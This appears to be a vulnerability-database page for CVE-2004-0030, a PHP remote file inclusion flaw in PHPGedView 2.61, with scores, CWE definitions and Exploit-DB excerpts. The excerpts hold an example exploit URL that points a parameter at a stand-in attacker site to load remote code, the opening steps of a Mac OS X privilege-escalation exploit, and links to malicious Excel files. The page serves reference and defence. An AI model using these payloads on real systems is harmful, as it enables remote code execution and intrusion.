CVE-2004-0030
published 2004-01-20CVE-2004-0030: PHP remote file inclusion vulnerability in (1) functions.php, (2) authentication_index.php, and (3) config_gedcom.php for PHPGEDVIEW 2.61 allows remote…
PriorityP341critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
6.84%
93.2th percentile
PHP remote file inclusion vulnerability in (1) functions.php, (2) authentication_index.php, and (3) config_gedcom.php for PHPGEDVIEW 2.61 allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains the code.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpgedview | phpgedview | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
exploitdb·2007-01-29
CVE-2007-0467 Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
---
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 [email protected]..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 000
Exploit-DB
Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
exploitdb·2006-01-09
CVE-2006-0030 Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
---
source: https://www.securityfocus.com/bid/16181/info
Microsoft Excel is susceptible to a code-execution vulnerability. The issue presents itself when Excel tries to process malformed or corrupted XLS files.
Attackers may exploit this issue to execute arbitrary machine code in the context of the affected application.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-1.xls
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-2.xls
Exploit-DB
PHPGedView 2.61 - Multiple Remote File Inclusions
exploitdb·2004-01-06
CVE-2004-0030 PHPGedView 2.61 - Multiple Remote File Inclusions
PHPGedView 2.61 - Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/9368/info
PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require() paths for various external files. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.
These issues are reported to affect PhpGedView 2.61. Other versions are also likely affected.
http://www.example.com/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/functions.php?PGV_BA
No writeups or analysis indexed.
CWE
Inclusion of Functionality from Untrusted Control Sphere
mitre_cwe
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CWE-829: Inclusion of Functionality from Untrusted Control Sphere
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Confidentiality, Integrity, Availability. Impact: Execute Unauthorized Code or Commands. An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or permissions to t
CWE
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
mitre_cwe
CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope:
http://marc.info/?l=bugtraq&m=107340840209453&w=2http://secunia.com/advisories/10565http://www.osvdb.org/3343http://www.securityfocus.com/bid/9368http://www.securitytracker.com/id?1008632https://exchange.xforce.ibmcloud.com/vulnerabilities/14159http://marc.info/?l=bugtraq&m=107340840209453&w=2http://secunia.com/advisories/10565http://www.osvdb.org/3343http://www.securityfocus.com/bid/9368http://www.securitytracker.com/id?1008632https://exchange.xforce.ibmcloud.com/vulnerabilities/14159
2004-01-20
Published